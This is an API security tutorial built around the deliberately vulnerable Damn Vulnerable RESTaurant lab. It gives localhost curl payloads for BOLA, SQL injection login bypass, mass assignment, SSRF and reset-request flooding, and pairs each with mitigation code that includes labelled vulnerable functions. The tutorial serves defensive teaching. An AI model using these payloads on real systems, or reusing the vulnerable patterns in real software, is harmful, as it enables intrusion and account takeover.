Damn Vulnerable RESTaurant: A Hands-On Guide to API Security Testing


The Damn Vulnerable RESTaurant is an intentionally insecure API service designed for developers, ethical hackers, and security engineers to practice identifying and exploiting common API vulnerabilities, including those listed in the OWASP Top 10 API Security Risks 2023.

🔗 GitHub Repository: https://github.com/KrzysztofPranczk/Damn-Vulnerable-RESTaurant
🔗 Blog : https://medium.com/@krzysztofpranczk/introducing-damn-vulnerable-restaurant

You Should Know: Essential Commands & Techniques for Testing API Security

1. Setting Up the Lab

Clone the repository and run the vulnerable API locally:

git clone https://github.com/KrzysztofPranczk/Damn-Vulnerable-RESTaurant.git
cd Damn-Vulnerable-RESTaurant
docker-compose up --build

2. Common API Attacks & Mitigations

Broken Object Level Authorization (BOLA)

Exploit (the bearer token belongs to an ordinary authenticated user who does not own user 1; an invalid token would test authentication, not object-level authorization):

curl http://localhost:8000/api/users/1 -H "Authorization: Bearer <LOW_PRIVILEGE_USER_TOKEN>"

Mitigation: On every request, check that the authenticated caller is permitted to access the specific object (here, the user id in the path), not merely that the caller is logged in.
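The check described above, as an added example that is not code from the Damn Vulnerable RESTaurant project: a "read user profile" handler written once without and once with an object-level authorization check. It is plain Python so it runs without FastAPI; the users table, the token table and the role names are constructed sample data.

```python
# Added example, not code from the Damn Vulnerable RESTaurant project: an object-level
# authorization check for a "read user profile" handler, written as plain functions so
# it runs without FastAPI. User records and bearer tokens are constructed sample data.
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass(frozen=True)
class User:
    id: int
    username: str
    role: str  # "customer" or "admin" (constructed role names)


# Constructed stand-in for the users table.
USERS: Dict[int, User] = {
    1: User(1, "alice", "customer"),
    2: User(2, "bob", "customer"),
    3: User(3, "root", "admin"),
}

# Constructed stand-in for session storage: opaque token -> user id.
# A real service would verify a signed token (e.g. a JWT) instead.
TOKENS: Dict[str, int] = {"tok-alice": 1, "tok-bob": 2, "tok-admin": 3}


class Unauthorized(Exception):
    """401: the caller could not be identified."""


class Forbidden(Exception):
    """403: the caller is identified but may not access this object."""


def authenticate(auth_header: Optional[str]) -> User:
    """Map an Authorization header to the calling User, or raise Unauthorized."""
    if not auth_header or not auth_header.startswith("Bearer "):
        raise Unauthorized("missing bearer token")
    uid = TOKENS.get(auth_header[len("Bearer "):])
    if uid is None:
        raise Unauthorized("invalid token")
    return USERS[uid]


def get_user_vulnerable(auth_header: Optional[str], user_id: int) -> User:
    """BOLA: the caller is authenticated, but nothing ties the requested id to the
    caller, so any logged-in user can read any profile by changing the id in the URL."""
    authenticate(auth_header)
    return USERS[user_id]


def get_user_fixed(auth_header: Optional[str], user_id: int) -> User:
    """Object-level check: customers may read only their own record, admins any record."""
    caller = authenticate(auth_header)
    # Decide the caller's relationship to the *requested* id before touching the
    # record, so the decision never depends on whether the record exists.
    if caller.role != "admin" and caller.id != user_id:
        raise Forbidden(f"user {caller.id} may not read user {user_id}")
    target = USERS.get(user_id)
    if target is None:
        raise KeyError(f"no user {user_id}")
    return target
```

In a FastAPI service the same decision belongs in a dependency that receives the resolved current user and the path parameter; the important property is that the comparison between caller and requested object happens on every object-returning route, not only on the login route.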

Injection Attacks (SQLi, Command Injection)

Exploit (SQLi):

curl -X POST http://localhost:8000/api/login -H "Content-Type: application/json" --data "{\"username\":\"admin'--\",\"password\":\"anything\"}"

Mitigation: Use parameterized queries (bound parameters) so request input is passed to the database as data, never concatenated into SQL text.
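To show why the `admin'--` payload above works and how a bound parameter stops it, here is an added example (not the project's own login code) using an in-memory SQLite database with constructed sample accounts. The password hashing is simplified to SHA-256 to keep the example dependency-free; the injection and its fix do not depend on that choice.

```python
# Added example, not the project's own login code: the same login query written with
# string formatting (injectable) and with a bound parameter. Uses an in-memory SQLite
# database with constructed sample accounts.
import hashlib
import hmac
import sqlite3
from typing import Optional


def _digest(password: str) -> str:
    # SHA-256 keeps the example dependency-free; a real service uses a slow,
    # salted password hash such as argon2 or bcrypt.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Create the constructed users table with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [("admin", _digest("correct-horse-battery")), ("alice", _digest("hunter2"))],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[int]:
    """Builds the WHERE clause from raw input. With username "admin'--" the query becomes
        ... WHERE username = 'admin'--' AND password_hash = '...'
    and everything after -- is an SQL comment, so the password check disappears."""
    sql = (
        f"SELECT id FROM users WHERE username = '{username}' "
        f"AND password_hash = '{_digest(password)}'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn: sqlite3.Connection, username: str, password: str) -> Optional[int]:
    """Parameterized query: the driver sends the username as a value, never as SQL text.
    The password is then compared in application code with a constant-time comparison."""
    row = conn.execute(
        "SELECT id, password_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None or not hmac.compare_digest(row[1], _digest(password)):
        return None
    return row[0]
```

Note that the fix is not escaping: the `?` placeholder means the username `admin'--` is looked up literally, finds no such account, and the login fails.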

Mass Assignment

Exploit:

curl -X POST http://localhost:8000/api/users -H "Content-Type: application/json" -d '{"username":"attacker","isAdmin":true}'

Mitigation: Accept only an explicit allowlist of client-settable fields, and set privileged fields such as isAdmin server-side after the body has been filtered.
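An added example, not the project's own handler, of the request body from the curl command above hitting a handler that merges the whole body into the record, beside one that keeps an allowlist of fields and applies server-controlled values last. The allowlist and the sample bodies are constructed for the example.

```python
# Added example, not the project's own handler: a user-creation handler that spreads the
# request body straight into the record (mass assignment) beside one that only accepts an
# explicit allowlist of fields. The allowlist and request bodies are constructed.
from typing import Any, Dict, Set

# Fields a client is permitted to set when registering (constructed for the example).
CREATE_USER_ALLOWED: Set[str] = {"username", "email", "password"}


def create_user_vulnerable(body: Dict[str, Any]) -> Dict[str, Any]:
    """Server defaults are set first, then the whole body is merged on top,
    so a body containing "isAdmin": true overrides the default."""
    record: Dict[str, Any] = {"isAdmin": False, "active": True}
    record.update(body)
    return record


def pick_allowed(body: Dict[str, Any], allowed: Set[str], strict: bool = True) -> Dict[str, Any]:
    """Return only allowlisted keys. In strict mode an unknown key is an error
    (the safer default: it surfaces tampering in logs); otherwise it is dropped."""
    unknown = set(body) - allowed
    if unknown and strict:
        raise ValueError(f"unexpected field(s): {sorted(unknown)}")
    return {key: value for key, value in body.items() if key in allowed}


def create_user_fixed(body: Dict[str, Any], strict: bool = True) -> Dict[str, Any]:
    """Filter the body through the allowlist, then apply server-controlled values last
    so the client cannot influence them whatever the body contains."""
    for required in ("username", "password"):
        if required not in body:
            raise ValueError(f"missing required field: {required}")
    record = pick_allowed(body, CREATE_USER_ALLOWED, strict)
    record["isAdmin"] = False
    record["active"] = True
    return record
```

With FastAPI, the same effect is obtained by declaring the request model with Pydantic and forbidding extra fields (`extra="forbid"` in the model config), and by keeping `isAdmin` out of the request model entirely.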

Server-Side Request Forgery (SSRF)

Exploit:

curl "http://localhost:8000/api/fetch?url=http://internal-server.local"

Mitigation: Validate the URL's scheme and host against an allowlist, reject userinfo and unexpected ports, and resolve the host to confirm it does not point at a private, loopback or link-local address before the server makes the request.
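The validation described above as an added example, not the project's own fetch handler. The hostname allowlist and the fake DNS table are constructed so the checks can be exercised offline; the real resolver (`socket.gethostbyname`) is the default when no resolver is passed.

```python
# Added example, not the project's own fetch handler: validation of a user-supplied URL
# before the server requests it. The host allowlist and FAKE_DNS are constructed.
import ipaddress
import socket
from typing import Callable, Dict, Set
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
DEFAULT_PORTS = {"http": 80, "https": 443}
# Constructed allowlist of external hosts the service legitimately needs to reach.
ALLOWED_HOSTS: Set[str] = {"api.partner.example", "cdn.partner.example"}


def is_public_address(ip_text: str) -> bool:
    """True only for globally routable unicast addresses. Private (RFC 1918), loopback,
    link-local (169.254/16, where cloud metadata endpoints live), reserved and
    multicast ranges all return False."""
    ip = ipaddress.ip_address(ip_text)
    return ip.is_global and not (ip.is_multicast or ip.is_reserved)


def validate_fetch_url(url: str, resolver: Callable[[str], str] = socket.gethostbyname) -> Dict[str, str]:
    """Return the scheme, host, port and resolved address to connect to, or raise ValueError."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    # "http://allowed.host@internal/" parses allowed.host as the username; reject userinfo.
    if parts.username is not None or parts.password is not None:
        raise ValueError("userinfo in URL not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"host not allowlisted: {host!r}")
    port = parts.port or DEFAULT_PORTS[parts.scheme]
    if port != DEFAULT_PORTS[parts.scheme]:
        raise ValueError(f"port not allowed: {port}")
    # Allowlisting the name is not enough: its DNS record can point at an internal
    # address, so resolve and check the address as well.
    address = resolver(host)
    if not is_public_address(address):
        raise ValueError(f"{host} resolves to non-public address {address}")
    return {"scheme": parts.scheme, "host": host, "port": str(port), "address": address}


# Constructed DNS answers for offline use; 8.8.8.8 stands in for "some public address".
FAKE_DNS = {
    "api.partner.example": "8.8.8.8",
    "cdn.partner.example": "10.0.0.7",      # allowlisted name pointing inside the network
    "internal-server.local": "10.0.0.5",
}


def fake_resolver(name: str) -> str:
    try:
        return FAKE_DNS[name]
    except KeyError:
        raise socket.gaierror(f"unknown host {name}")
```

Two caveats the code comments only hint at: the HTTP client should connect to the returned `address` (or pin it) rather than resolving the name a second time, otherwise a DNS answer that changes between check and use bypasses the check, and it must not follow redirects automatically, since a redirect is just another attacker-chosen URL that needs the same validation.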

3. Automated API Scanning with OWASP ZAP

docker run -v "$(pwd):/zap/wrk" -t owasp/zap2docker-stable zap-api-scan.py -t http://localhost:8000/openapi.json -f openapi -r report.html

4. Fuzzing with FFUF

ffuf -u http://localhost:8000/api/FUZZ -w /usr/share/wordlists/dirb/common.txt

5. Rate Limiting Bypass

Exploit:

for i in {1..100}; do curl -X POST http://localhost:8000/api/reset_password -H "Content-Type: application/json" --data '{"email":"user@example.com"}'; done

Mitigation: Implement rate limiting keyed both on the client (address or session) and on the target account, and add a CAPTCHA for endpoints that trigger emails or other costly actions.
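An added example, not the project's own code, of the two-key limiting described above: a sliding-window limiter applied to a password-reset handler once per client address and once per target account. The limits, the client addresses and the clock are constructed so the 100-request loop above can be replayed without waiting.

```python
# Added example, not the project's own code: a sliding-window rate limiter applied to a
# password-reset handler on two keys, the client address and the target account.
# The clock is injectable so the burst can be simulated without real time passing.
import time
from collections import defaultdict, deque
from typing import Callable, Deque, Dict, List, Tuple


class SlidingWindowLimiter:
    def __init__(self, limit: int, window_seconds: float,
                 clock: Callable[[], float] = time.monotonic):
        self.limit = limit
        self.window = window_seconds
        self.clock = clock
        self._hits: Dict[str, Deque[float]] = defaultdict(deque)

    def allow(self, key: str) -> bool:
        """Record a hit for key; return False if it would exceed limit within the window."""
        now = self.clock()
        hits = self._hits[key]
        while hits and hits[0] <= now - self.window:
            hits.popleft()  # drop timestamps that have fallen out of the window
        if len(hits) >= self.limit:
            return False
        hits.append(now)
        return True

    def retry_after(self, key: str) -> float:
        """Seconds until the oldest hit in the window expires (for a Retry-After header)."""
        hits = self._hits[key]
        if not hits:
            return 0.0
        return max(0.0, hits[0] + self.window - self.clock())


class ResetPasswordEndpoint:
    def __init__(self, clock: Callable[[], float] = time.monotonic):
        # Constructed limits: 10 requests/minute per client address, 3/hour per account.
        self.per_ip = SlidingWindowLimiter(10, 60, clock)
        self.per_account = SlidingWindowLimiter(3, 3600, clock)
        self.emails_sent: List[str] = []  # stands in for the mail queue

    def handle(self, client_ip: str, email: str) -> Tuple[int, Dict[str, object]]:
        if not self.per_ip.allow(client_ip):
            return 429, {"error": "too many requests",
                         "retry_after": round(self.per_ip.retry_after(client_ip))}
        if self.per_account.allow(email.strip().lower()):
            self.emails_sent.append(email)
        # Same 202 whether or not mail was sent: the response reveals neither whether
        # the account exists nor whether it is currently throttled.
        return 202, {"status": "if that account exists, a reset link has been sent"}


class FakeClock:
    """Constructed clock for replaying the burst offline."""
    def __init__(self, start: float = 1000.0):
        self.now = start

    def __call__(self) -> float:
        return self.now

    def advance(self, seconds: float) -> None:
        self.now += seconds


def simulate_burst(n: int = 100) -> Tuple[ResetPasswordEndpoint, FakeClock, List[int]]:
    """Replay n reset requests for one address (constructed) against one account."""
    clock = FakeClock()
    endpoint = ResetPasswordEndpoint(clock)
    statuses = [endpoint.handle("198.51.100.7", "user@example.com")[0] for _ in range(n)]
    return endpoint, clock, statuses
```

The per-address limit is what turns the loop into 429s, but on its own it is defeated by spreading requests over many addresses; the per-account limit is what actually caps how many reset emails a single account can be made to receive.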

What Undercode Says

API security is critical in modern applications, and hands-on practice is essential. The Damn Vulnerable RESTaurant provides a safe environment to test exploits like BOLA, Injection, SSRF, and Mass Assignment. Always:
– Validate inputs
– Enforce strict authentication
– Monitor API traffic
– Use automated scanners like OWASP ZAP


References:

Reported By: Krzysztof Pranczk – Hackers Feeds
